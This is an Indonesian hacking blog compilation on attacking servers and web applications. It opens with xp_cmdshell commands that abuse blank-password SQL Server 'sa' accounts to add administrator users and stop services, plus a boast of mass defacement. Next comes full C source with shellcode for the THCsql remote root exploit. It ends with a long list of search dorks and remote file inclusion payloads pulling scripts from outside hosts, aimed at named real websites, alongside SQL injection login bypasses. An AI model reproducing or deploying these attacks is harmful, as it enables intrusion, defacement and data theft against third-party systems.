Banyak yang menggantungkan nasib perusahaan pada sang SQL Server. Namun kesalahan konfigurasi atau miskonfigurasi dari SQL Server bisa menyebabkan suatu keadaan yang fatal bagi sistem database dan bahkan mengakibatkan efek yang berbahaya bagi sistem komputer tempat SQL Server diinstall. Bisa hapus file dan shutdown sistem lho hueheheh ;) Sebelumnya penulis perlu menjelaskan bahwa artikel ini tidak mempunyai maksud tertentu selain untuk ilmu pengetahuan dan kebebasan dalam berbagi ilmu pengetahuan. Penulis tidak bertanggung jawab apapun terhadap segala sesuatu yang terjadi akibat artikel ini. Artikel ini bersifat terbuka yang berarti Anda bisa memberikan kritik dan saran terhadap artikel ini melalui [email protected]. Anda dilarang keras mengutip sebagian atau seluruh artikel ini tanpa sepengetahuan penulis. SQL Server yang akan kita bahas disini menggunakan SQL Server 7 atau bisa juga versi 2000 nya. SQL Server 7 memberikan dua jenis autentikasi untuk mengakses server database yaitu: 1. Windows NT Authentication Mode 2. Mixed Mode Jika Anda menginstall SQL Server dengan menggunakan Windows NT Authentication Mode maka secara otomatis login ke SQL Server akan mengikuti login Windows NT dan user dari Windows NT sajalah yang berhak untuk mengakses SQL Server. Jika SQL Server diinstall pada Mixed Mode maka setiap user yang login ke SQL Server bisa diautentikasi oleh Windows NT atau oleh SQL Server itu sendiri. User login yang diautentikasi oleh SQL Server harus memberikan username dan password yang dimaintenance sendiri oleh SQL Server dan ini merupakan salah satu awal bencana. Ketika Anda menginstall SQL Server pada Mixed Mode maka secara otomatis SQL Server memiliki default account SA (system administrator) dengan password kosong (blank password). Jika Anda login dengan account "sa" ini maka Anda sudah memiliki hak akses sangat luar biasa terhadap SQL Server yang meliputi semua database, tabel, stored procedure, security dan bahkan secara sadar atau tidak Anda juga otomatis memiliki akses besar ke

sistem komputer tempat SQL Server diinstall. Menurut pengamatan penulis dilapangan menunjukkan bahwa masih sangat banyak sekali SQL Server baik yang bersifat production server atau experiment server yang ternyata belum dikonfigurasi dengan benar. Salah satu contoh miskonfigurasi di SQL Server ya seperti yang sudah disebutkan diatas, yaitu DBA nya lupa memberi password untuk account "sa" dan SQL Server diinstall pada Mixed Mode. SQL Server memiliki extended stored procedure xp_cmdshell yang sangat mematikan. xp_cmdshell ini bisa menjalankan perintah shell pada SQL Server seperti jika Anda mengetikkan perintah-perintah shell pada layar console Windows NT. xp_cmdshell ini berada pada database master dan ini juga harus diatur hak pemakaiannya atau jika memang tidak perlu bisa dihapus. Tulisan mengenai SQL Server security check list akan disampaikan pada kesempatan yang lain. Oh ya, SQL Server bisa diakses oleh berbagai protokol seperti Named Pipe Net-Library atau melalui TCP/IP. SQL Server melalui TCP/IP akan membuka port 1433. Para pembaca mungkin masih ada yang bingung mengenai bencana apa saja akibat miskonfigurasi diatas. OK, penulis akan memberi contoh beberapa bencana yang mungkin terjadi jika Anda sudah bisa login ke SQL Server sebagai user "sa": 1. Bisa membuat user pada Windows NT dengan level sekelas Administrator. Ini bisa dicapai dengan cara mengeksekusi command seperti berikut pada SQL Server use master xp_cmdshell 'net user adminbaru admin /add' go xp_cmdshell 'net localgroup Administrators adminbaru /add' go Dengan perintah diatas maka Anda membuat user adminbaru dengan password admin pada Windows NT dan sekaligus menjadikannya sekelas Administrator. 2. Bisa men-start atau men-stop service pada Windows NT Ini bisa dilakukan dengan perintah net start atau net stop, contoh berikut adalah untuk men-stop service HTTP pada Windows NT yang berakibat matinya web server :) use master xp_cmdshell 'net stop w3svc' go 3. Bisa membuat FTP script untuk melakukan suatu download file dari server lain.

4. Bisa digunakan untuk men-deface website ;) Nah kalo yang ini mungkin banyak yang suka ;) Karena men-deface lewat SQL Server jauh lebih mudah daripada lewat bug unicode. Kalo pada bug unicode kita masuk ke sistem sesuai denganhak akses dari user IUSR_MACHINENAME, maka jika kita masuk ke sistem dengan SQL Server maka kita akan masuk dengan hak akses LocalSystem sehingga kita bisa melakukan apa saja di server, termasuk bisa menshutdown sistem kalo mau :) Tulisan mengenai mendeface website dengan SQL Server akan penulis sajikan pada kesempatan lain. 5. Bisa untuk mass-defacing, ah masak? Lho iya, penulis sendiri pernah masuk ke host SQL Server yang kebetulan adalah milik suatu perusahaan web hosting di Israel dan kebetulan didalamnya terdapat puluhan wwwroot untuk beberapa domain yang berbeda. Tinggal copy aja file kita ke masing-masing folder tadi, jadilah sudah mass defacing yang ternyata cuman masuk ke satu host saja huehehe ;) 6. Bisa mengakses registry windows yang berakibat dengan mengambil password Windows NT atau juga membuat key dan value pada registry. Demikian beberapa bencana yang dapat menimpa sistem Windows NT yang terdapat SQL Server yang belum dikonfigurasi dengan benar. Sebenarnya masih banyak lagi bencanabencana lain yang dapat muncul dan itu memang tergantung dari imajinasi Anda para hacker Semakin Anda mengerti dan menguasai suatu sistem maka semakin banyak pula trik dan kemampuan Anda untuk mengeksploitasi sistem. Jika Anda berminat untuk mencoba maka sekarang mulai saja menscan host yang port 1433 nya terbuka dan jika sudah menemukan host yang port 1433 nya terbuka cobalah akses kesana dengan menggunakan program Query Analyzer atau Anda juga bisa menggunakan SQL Server query dalam mode dos yaitu isql.exe. Jika Anda ingin mencobanya dengan ISQL maka coba ajah ketikkan perintah berikut untuk login ke SQL Server dari command prompt: C:>isql -S targethost -U sa Kemudian tekan enter, dan akan muncul inputan password, terus tekan enter saja. Jika host tersebut masih menggunakan password blank maka akan muncul SQL prompt seperti dibawah 1> Pada prompt tersebut Anda

bisa mengetikan perintah SQL anda, misalnya seperti dibawah 1>select * from sysusers 2>go OK, akhirnya penulis berpesan bahwa jaga baik-baik SQL Server Anda, jangan lupa untuk mengisi password pada account "sa" (account "sa" tidak bisa di-rename atau dihapus). Sebenarnya masih banyak lagi yang harus diperhatikan pada SQL Server daripada sekedar mengganti password account "sa", tetapi dengan begitu saja sudah meminimalkan intrusion pada sistem Anda. Terimakasih, mission complete. 0 comments Source code Exploit MSSQL at 10:04 AM Posted by Ade cahya #include #include #include #include char badbuffer[] = "\x04" "THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTH CTHC" "THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTH CTHC" "\xdc\xc9\xb0\x42" "\xeb\x0e" "JC" "THC!" "\x01\x70\xae\x42" "\x01\x70\xae\x42" "\x8b\xfc\x83\xc7\x2c\x66\x81\xec\x04\x02\x33\xc9\xb2\x35\x66" "\x81\xc1\x38\x01\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\xde\x16" "\x4f\x5c\x37\x30\x59\x6c\xcd\x28\xa9\xeb\xb9\xe4\x79\x45\xe1" "\x36\xc5\x12\x15\x15\x05\x3d\x62\x66\x07\x6a\x06\x07\x1b\x71"

"\x79\x79\x34\xde\x30\xdd\xcc\xca\xca\xca\x68\xb6\xd8\x1f\x5f" "\x05\x6c\x51\xbe\x34\xbe\x75\x39\xbe\x45\x29\x98\xbe\x4d\x3d" "\xb8\x6a\x09\xbe\x2e\x34\xce\xbe\x6e\x4d\x34\xce\xbe\x7e\x29" "\x34\xcc\xbe\x66\x11\x34\xcf\x66\x64\x67\xbe\x6e\x15\x34\xce" "\x04\xfc\x74\x04\xf5\xac\xbe\x01\xbe\x34\xcb\x99\x04\xf7\xe4" "\xd7\xb1\xf5\x40\xc2\x3a\x83\x70\x30\xb8\x71\x70\x31\x53\x0c" "\x25\x40\xd4\x53\x04\x25\x6f\x6d\x6b\x63\x65\x67\x1e\x7b\x25" "\x74\x3a\x82\x39\x7f\xbe\x31\xbd\x34\xcd\x3a\x83\x78\x30\xbc" "\x71\xb8\xed\xcb\x78\x30\x40\x8b\xcb\x78\x31\x41\x14\xcb\x78" "\x17\xb8\x68\x2d\x66\xca\xe5\xbc\xf2\x5f\x31\x6d\xbd\x70\x30" "\xb5\x70\x42\x3f\xb8\x68\x41\xb5\x5e\x13\x21\xdc\x4d\xca\xca" "\xca\xbc\xfb\x04\xee\x66\x66\x66\x66\x63\x73\x63\xca\xe5\xa2" "\x60\x6d\x53\xbc\x05\x5f\x25\x60\x62\xca\x60\xe1\x7b\x63\x62" "\xca\x60\xf9\x66\x60\x62\xca\x60\xe5\xa2\xb8\x70\xbd\x65\xca" "\x60\xd1\x60\x60\xca\x60\xdd\xb8\x71\x30\x39\xa1\x66\x5d\x1b" "\x50\x4d\x50\x5d\x69\x56\x58\x51\xa1\x04\xe7\xb8\x70\xf9\xa1" "\x62\x62\x62\x66\x66\xcb\xf3\x34\xc7\x67\xa1\xb8\x70\x4d\x65" "\xb8\x70\xbd\x65\x84\x3d\x66\x66\x5f\x25\xcb\xfb\x67\x66\x66" "\x66\x60\xca\x60\xd9\x5f\xca\xca\x60\xd5"; void usage(); int main(int argc, char *argv[]) { unsigned short sqlport=1434; unsigned int sock,addr,rc; struct sockaddr_in sqludp; struct hostent * hp; WSADATA wsaData; printf("\nTHCsql v0.1 - Wind0wZ remote root sploit for MSSQLServers < SP3\n"); printf("by Johnny Cyberpunk ([email protected])\n"); printf("bug was found by David Litchfield\n"); if(argc<2) usage(); if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)

{ printf("WSAStartup failed !\n"); exit(-1); } hp = gethostbyname(argv[1]); if (!hp){ addr = inet_addr(argv[1]); } if ((!hp) && (addr == INADDR_NONE) ) { printf("Unable to resolve %s\n",argv[1]); exit(-1); } sock=socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP); if (!sock) { printf("socket() error...\n"); exit(-1); } if (hp != NULL) memcpy(&(sqludp.sin_addr),hp->h_addr,hp->h_length); else sqludp.sin_addr.s_addr = addr; if (hp) sqludp.sin_family = hp->h_addrtype; else sqludp.sin_family = AF_INET; sqludp.sin_port=htons(sqlport); rc=connect(sock, (struct sockaddr *) &sqludp, sizeof (struct sockaddr_in)); if(rc==0) { send(sock,badbuffer,sizeof(badbuffer)-1,0);

printf("\nexploit send .... sleeping a while ....\n"); Sleep(1000); printf("\nok ... now try to connect to port 31337 via netcat !\n"); } else printf("can't connect to sql port udp 1434!\n"); shutdown(sock,1); closesocket(sock); exit(0); } void usage() { unsigned int a; printf("\nUsage: \n"); exit(0); 1 comments SQL inject, bugs and.... Tuesday, February 6, 2007 at 11:46 AM Posted by Ade cahya Wow klo yang nge bahas ini kayaknya ngga ada abisnya soalnya uptodate tiap menit bahkan detik siapa tuh yang update yahh para hacker didunia ini.trus penulis disini TIDAK bertanggung jawab atas apa yang telah dilakukan oleh Pelakunya penulis hanya sekedar menulis untuk kepentingan SECURITY(bahasa Gaulnya). NGGA BERTANGGUNG JAWAB ATAS PENYALAHGUNAAN TULISAN INI.titik Pembahasan: SEMUA INI DARI SABEN -----> -----------------------------------------------keyword:inurl:"/cart.php?m=" contoh:http://www.facesbyfelicia.com/store/cart.php?m=view ganti tulisn cart.php?m=view dengan admin jadi http://www.facesbyfelicia.com/store/admin trus login pake sql username : 'or"=" password :'or"="

-----------------------------------------------keyword inurl:"/modernbill" contoh:http://billing.ourweb.net/modernbill/ masukin injekannya:include/html/config.php?DIR=http://oneserver.us/injek.txt? jadi:http://billing.ourweb.net/modernbill/include/html/config.php?DIR= http://one-server.us/injek.txt? -----------------------------------------------keyword:"Powered by SunShop 3.2" atau: inurl:"/sunshop/index.php?action=" contoh http://www.dohertysgym.com/sunshop/index.php ganti kata index.php dengan admin jadi : http://www.dohertysgym.com/sunshop/admin login pake user: admin pass: 'or''=' -----------------------------------------------inurl:"modules.php?name=SQuery" injek:SQuery/lib/gore.php?libpath=http://one-server.us/item.txt? contoh:http://www.diesworld.com/SQuery/lib/gore.php?libpath=http://one-server.us/item.txt? -----------------------------------------------google:allinurl:com_galleria injek:components/com_galleria/galleria.html.php?mosConfig_absolut e_path=http://one-server.us/item.txt? contoh:http://www.a1gpracing.net/components/com_galleria/galleria.h tml.php?mosConfig_absolute_path=http://coffee-pot.info/injek.txt? -----------------------------------------------google:allinurl:"/auth/lostPassword.php" contoh:http://www.kbsbrig.ch/claroline/claroline/auth/lostPassword.ph p injek:ldap/authldap.php?includePath=http://one-server.us/item.txt? jadi:http://www.kbsbrig.ch/claroline/claroline/auth/ldap/authldap.php?i ncludePath=http://one-server.us/item.txt -----------------------------------------------google:intitle:"Multimedia Flash Website Builder" contoh:www.webdesignhq.com/sitebuilder/index.php injek:sitebuilder/admin/top.php?admindir=http://oneserver.us/item.txt? jadi:www.webdesignhq.com/sitebuilder/admin/top.php?admindir=http: //one-server.us/item.txt? ------------------------------------------------

gogle:"software 2004-2005 by randshop" contoh:http://www.dieterkropp.com/shop/themes/kategorie/index.php ?id=20&katid=32&action=detail injek:includes/header.inc.php?dateiPfad=http://one-server.us/item.txt? jadi:http://www.dieterkropp.com/shop/includes/header.inc.php?dateiPf ad=http://one-server.us/item.txt? -----------------------------------------------keyword;"powered by geeklog" contoh:http://www.kobe-ch.com/index.php injek:plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http: //geocities.com/shella_kapas/kek.jpg? jadi:http://www.kobech.com/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=ht tp://geocities.com/shella_kapas/kek.jpg? -----------------------------------------------google:inurl:"/product.php?printable=" atau "powered by x-cart" inurl:"/home.php?printable=" ganti tulisan itu semua dengan admin kekekek biasa sqlnya cari sendiri ya -----------------------------------------------keyword:inurl:"/index. php?option=com_rsgallery" bug:components/com_rsgallery/rsgallery.html.php?mosConfig_absolu te_path=http://elang13.org/item,txt? contoh:http://www.pass-myshotgun.co.uk/components/com_rsgallery/rsgallery.html.php?mosCon fig_absolute_path=http://elang13.org/item.txt? -----------------------------------------------keyword:"Advanced Poll" inurl:/admin/ contoh:http://www.kgcshop.or.kr/shop/admin/poll/admin/index.php bug:common.inc.php?base_path=http://elang13.org/item.txt? jadi:http://www.kgcshop.or.kr/shop/admin/poll/admin/common.inc.php ?base_path=http://elang13.org/item.txt? -----------------------------------------------inurl:"powered by cs-cart" injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://el ang13.org/item/txt? -----------------------------------------------inurl:"/catalogue.php?cat=" ganti tulisan catalogue.php?cat= dengan admin selanjutnya tguas ente ente sekalian nyari sqlnya hak hak hak

inurl:"/DoceboScs" injek:doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=http://ela ng13.org/hitam.txt? inurl:"/DoceboCore" injek:doceboCore/lib/lib.php?GLOBALS[where_framework]=http://ela ng13.org/hitam.txt? inurl:"/DoceboLms" injek:doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=http:/ /elang13.org/hitam.txt? inurl:"/DoceboKms" injek:doceboKms/modules/documents/lib.filelist.php?GLOBALS[wher e_framework]=http://elang13.org/hitam.txt? inurl:"/DoceboCMS" injek:docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]= http://elang13.org/hitam.txt? -----------------------------------------------allinurl:"dload.php" injekan:pafiledb/includes/pafiledb_constants.php?module_root_path= http://elang13.org/hitam.txt? -----------------------------------------------"powered by squirrelcart" injek : squirrelcart/cart_content.php?cart_isp_root= -----------------------------------------------keyword inurl:/ubbthreads/ injek:addpost_newpoll.php?addpoll=preview&thispath=http://elang13. org/hitam.txt? -----------------------------------------------allinurl:"index.php?target=categories" injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://el ang13.org/item.txt? -----------------------------------------------google : "Exhibit Engine 1.5 RC 4" injek:photo_comment.php?toroot=http://elang13.org/item.txt? -----------------------------------------------inurl:"/modules/Forums/ injek:admin/admin_users.php?phpbb_root_path=http://elang13.org/ite m.txt? -----------------------------------------------allinurl: includes/include_once.php

bug:includes/include_once.php?include_file=http://elang13.org/item.t xt? -----------------------------------------------allinurl:/phplivehelper/blank.php injek:initiate.php?abs_path=hhttp://elang13.org/item.txt? -----------------------------------------------google:"powered by DreamAccount" injeknya: auth.cookie.inc.php?da_path=http://elang13.org/item.txt? auth.header.inc.php?da_path=http://elang13.org/item.txt? auth.sessions.inc.php?da_path=http://elang13.org/item.txt? -----------------------------------------------ashopKart20/" ganti tulisan yang ada didepannya ama admin/scart.mdb -----------------------------------------------inurl:"//comersus/" ganti /store/xxxx.asp dengan database/comersus.mdb -----------------------------------------------allinurl:/shop/category.asp/catid= hapus tuisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp liat file mdbnya donlot uka pake microsoft acsses ccnya biasayanya di encrypt http://rossm.net/Electronics/Computers/Software/ASP/RC4.asp -----------------------------------------------inurl:"/admin/default.asp" username:admin password:'or''=' span style="color: rgb(51, 51, 255);">-----------------------------------------------inurl:"/metacart/" injek : database/metacart.mdb -----------------------------------------------inurl:"/store/proddetail.asp?prod=" ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb -----------------------------------------------inurl:"/AdminLogin.asp" login pake sql ini : usename:1'or'1'='1 password:1'or'1'='1 -----------------------------------------------inurl:"com_a6mambocredits"

http://www.targer.com/administrator/components/com_a6mambocredi ts/admin.a6mambocredits.php?mosConfig_live_site=http://Senjata.co m/tembuspakeshell.txt -----------------------------------------------"Welcome to phpMyAdmin" inurl:main.php -----------------------------------------------filetype:sql ("passwd values ****" | "password values ****" | "pass values ****" ) -----------------------------------------------inurl:"com_peoplebook" inurl:"com_comprofiler"contoh gambar di bawah ini...!

Related Documents

Deface Web
May 2020 8
Deface Webpage
May 2020 9
Deface Web Kompolnas
May 2020 11
Contoh-contoh
April 2020 60
Contoh
November 2019 53

More Documents from ""